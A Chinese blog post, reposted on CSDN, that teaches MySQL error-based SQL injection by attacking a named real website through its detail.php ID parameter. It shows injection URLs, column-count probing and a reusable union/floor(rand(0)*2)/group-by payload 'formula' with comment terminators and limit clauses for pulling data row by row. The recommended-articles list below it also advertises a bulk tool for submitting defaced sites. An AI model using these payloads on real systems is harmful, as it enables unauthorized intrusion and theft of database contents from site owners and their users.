mysql 错误回显注入_MySQL错误回显套公式法注入Zone-h.com.cn

最新推荐文章于 2024-03-14 11:04:28 发布
最新推荐文章于 2024-03-14 11:04:28 发布
阅读量122 收藏
点赞数
文章标签: mysql 错误回显注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39827728/article/details/113324200
版权

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

阅读本文前请注意,php+MySQL注入,发生错误回显的有两种,一种是MySQL错误回显,即php提示MySQL语句哪里出错了,也就是能够用本文方法利用的注入,另外一种是php错误回显,php显示哪个文件的哪一行出错了,这种情况不在本文的讨论范畴之内。

作者:YoCo Smart

先看注入点:

http://zone-h.com.cn/detail.php?ID=55+and+1=1

有人用工具目测字段数为12,但是我们看地址:

http://zone-h.com.cn/detail.php?ID=55+union+select+1,2,3,4,5,6,7,8,9,10,11

字段11:“SQL语句错误: The used SELECT statements have a different number of columns”

http://zone-h.com.cn/detail.php?ID=55+union+select+1,2,3,4,5,6,7,8,9,10,11,12

字段12:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3,4,5,6,7,8,9,10,11,12' at line 1

字段是12不假,但是无显示位回显。

既然这样,那就用MySQL的报错回显来注入爆数据。

MySQL报错回显爆数据,其实主要就是套公式,公式分为4部分

1,逻辑错误部分,也就是将GET变量取值变为逻辑错误值,例如.php?id=0或者.php?id=12+and+1=2

2,固定SQL联合查询语句,语句为:

union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))a from information_schema.tables group by a)b

3,注释语句,将整个语句后面的部分注释掉,可以用"/*"注释符,也可以用"--"终止符,也可以用%23这个"#"字符

4,注入爆数据语句,基本格式就是select XX from YY的格式。

这4个固定公式唯一要注意的是最后一个,最后一个每次只能爆单条数据,不能updata不能select into不能insert不能load_file()不能group_concat(),有的concat()也不能用

这样爆数据的话,就要加一个limit x,y的限制条件

也就是select XX from YY limit a,b

a是从第几条开始,从0开始为以一条,b为目标一共几条数据,这里固定为1,也就是说limit 0,1是第1条数据,limit 1,1是第2条数据,一次类推。

weixin_39827728
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pipe-CMD.rar_CMD回显_CreateProcess_c++ cmd pipe_windows管道cmd_管道 c
07-15
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
SQL注入--显错注入
weixin_48803011的博客
12-14 735
显错注入就是通过sql注入再利用网页的显示位进行数据的读取
【SQL注入基础---显错注入
weixin_52351575的博客
07-26 1227
SQL注入入门-----显错注入学习与熟悉教程【适合零基础】
sql注入——显错注入
qq_33441500的博客
10-14 413
mysql注入——显错注入 一,sql注入的本质 注入攻击的本质是:把用户输入的数据当作代码执行。 注入的两个关键条件: 1,用户能控制输入。 2,原本程序要执行的代码,拼接了用户输入的数据。 sql注入就是在自带的系统数据库中查询库,表,字段,内容的过程 mysql内置自带库版本>=5 msyql库 保存账户信息,权限信息,存储过程,event,时区等信...
一个公布每天全球被黑网站的站点
jackyrongvip的专栏
08-31 791
呵呵,每天都公布的,不少咯。http://www.zone-h.org
mysql错误回显注入_第四篇:MySQL错误回显公式注入Zone-h.com.cn
weixin_39804329的博客
01-19 228
Silic技术论坛上的关于注入的文章已经很全面了,但是却并没有几篇关于MySQL错误回显注入的文章。唯一的一篇还是POST注入,相信大部分人是看不懂。原文在这里:看不懂没关系,我今天拿刚刚开放的zone-h.com.cn做一下演示。用这个站没有特别的含义,这个站前阵子关闭了,今天重新开放一看是XX市公安局。职业习惯加了个单引号。。。注意:阅读本文前请注意,php+MySQL注入,发生错误回显的有两...
JavaWeb新版教程. 项目第三阶段目-表单提交失败的错误回显.avi
05-17
JavaWeb新版教程. 项目第三阶段目-表单提交失败的错误回显.avi
M5310的使用例程.zip_M5310 回显指令_M5310的使用例程_boundeah_doc_m5310 sdk
07-14
包含 M5310通信流程示例流程,miplconf_generate_v1.2.c(鉴权码生成),OneNET_config_v1.2.exe(doc生成鉴权码程序)。
基于错误回显的SQL注入整理
12-14
 用我自己的话来讲,基于错误回显的sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。  0x01 用于错误...
net-tools.x86_64.rar
03-16
2. **ping**:通过发送ICMP回显请求来测试网络连接的可达性。例如,`ping www.baidu.com`可以检查到百度网站的网络连通性。 3. **netstat**:显示网络状态信息,如活动的网络连接、路由表、接口统计等。例如,`...
zoneh:Zone-H 网络犯罪档案电报监控机器人
05-30
区域 Zone-H 网络犯罪档案监控电报机器人。 免责声明 仅用于调查/研究目的。 安装 确保你有 Python >= 3.6 使用pip3 clone repo 并安装依赖pip3 。 git clone https://github.com/tropicoo/zoneh.git pip3 install -r requirements.txt 配置 首先,您需要并获取其令牌。 在启动bot之前需要进行配置。 配置只是以JSON格式存储。 将默认config-template.json附带的默认配置文件config-template.json复制到config.json并编辑: { " telegram " : { " token " : " " , " allowed_user_ids " : [] }, " log_level " : " DE
Zone-H批量提交工具
08-21
Zone-H黑页批量提交工具 ------------------------------------------------------- 专用批量提交网站黑页 http://www.zone-h.com.cn/submit.php 黑阔必备利器。测试运行平台winxp-win2003-win7 使用说明: 首先注册组件 comdlg32.ocx.bat 导入黑页格式: 宇少-----http://shyjykc.com/goddess.html 宇少-----http://www.hyblawyer.com/goddess.html 宇少-----http://www.lsqsdl.com/goddess.html 宇少-----http://lsbarcode.com/jyhack.html 宇少-----http://fanyunjiaoyu.com/jyhack.html 宇少-----http://jiademy.com/jyhack.html 昵称-----黑页地址 记住:分割线一定要是5个,否则无批量提交 skin.she 皮肤文件 SkinH_VB6.dll 皮肤库文件。 校效结果如下,如有不同说明文件被修改过 CRC32:21588312 md5:e846dd9cd7c20537ce2070d3f2f90859 BY:宇少 http://www.jyhack.com
The used SELECT statements have a different number of columns错误的解决办
最新发布
Liutianen123的博客
03-14 713
出现这种错误的情况,一般是使用UNION或UNION ALL时,UNION或UNION ALL两边列数不对等的情况下出现的,这是我们需要检查两边的字段是否相等,如果不相等,只需补充完整即可。如果没有多余的数据,可以采用NULL AS 字段来进行补充,其中的字段一定是UNION或UNION ALL其中一边缺少的字段。读者应根据自己的代码进行修改!
DVWA通关-SQL注入
weixin_43669349的博客
08-24 771
安全入门-DVWA通关-SQL注入篇 开篇之前 我知道网上也有很多通关攻略,但都是别人通关,复制粘贴也是别人的,所以就想写一下自己的。写下这篇文章主要是记录自己的学习,以及和各位朋友交流,有错误的地方,希望各位大佬指出,谢谢。 DVWA介绍 DVWA是一个非常适合新人入门安全的靶场。这个靶场涵盖了暴力破解、命令注入、CSRF、文件包含、上传文件、不安全的验证码、SQL注入、XSS注入等漏洞,有Low、Medium、High、Impossible四个等级。这一次带来的是SQL注入的通关攻略。 SQL注入简介
1222 - The used SELECT statements have a different number of columns
write less , do more
03-31 1万+
使用MySQL的union all 或者onion查询时报如下错误: 1222 - The used SELECT statements have a different number of columns 翻译过来的意思是:使用的select语句有不同的列数。 因为使用union的两个SQL语句产生的记录的表结构不一致。必须是结构完全一致的记录集合才可以使用UNION。我这边就是两个表的union字段数量不一样,导致上述报错。我的解决办是在使用 UNION ALL 进行表合并操作时,使用 null
MySQL:The used SELECT statements have a different number of columns
热门推荐
Asurplus
04-16 26万+
执行SQL报错:The used SELECT statements have a different number of columns 以上翻译:使用的SELECT语句具有不同数量的列 原因:我们在 SQL 语句中使用了 UNION 连接两张表时,查询字段数量不一致导致 错误案例: 我们需要将数据展示如上图所示 SELECT a.quantity AS in_quantity, a....
SQL注入 :出现The used SELECT statements have a different number of columns错误
qq_46494827的博客
05-02 1992
The used SELECT statements have a different number of columns错误
The used SELECT statements have a different number of columns 错误解决
茕夜
08-04 6万+
昨天,遇到了一个sql异常错误信息:java.sql.SQLException: The used SELECT statements have a different number of columns,sql我自己随意写了一个,大概是这样子:SELECT S.s1 AS n1, S.s2 AS n2, Y.y2 AS n3, S.s3 AS n4 FROM
vue页面回显数据_vue + element-ui Table的数据多选,多页选择数据回显,分页记录保存选中的数据。...
06-06
对于多选的Table数据回显,可以使用Vue中的v-model来实现。你可以在data中定义一个选中的数组,然后在Table中使用v-model绑定这个数组,这样就可以实现多选数据回显了。 例如: ```html <el-table :data=...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值